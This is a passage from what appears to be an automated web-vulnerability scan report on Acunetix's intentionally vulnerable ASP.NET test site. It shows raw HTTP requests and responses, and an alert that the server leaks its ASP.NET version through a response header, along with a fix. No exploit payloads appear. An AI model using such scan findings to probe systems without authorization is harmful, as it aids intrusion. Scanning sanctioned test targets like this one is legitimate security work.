6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2BL5%2FdFSm3qL6WSrtXoxMhBWz78mQ%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17924
          
          
          Response body (17924 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+8ZVr2gCWJCE5ixl1VDrXamngxrA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        29. POST http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (399 bytes)
          POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Signup.aspx
          Content-Length: 1098
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1098 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8wYbzXe%2BsXxDpSfVp4SwbIP85RvA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13177
          
          
          Response body (13177 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/rVVS1oArBGNWHuMPoCTb1Ib2vQA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						<span id="lblStatus">Subscription successfull. Please visit the login page to login.</span>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
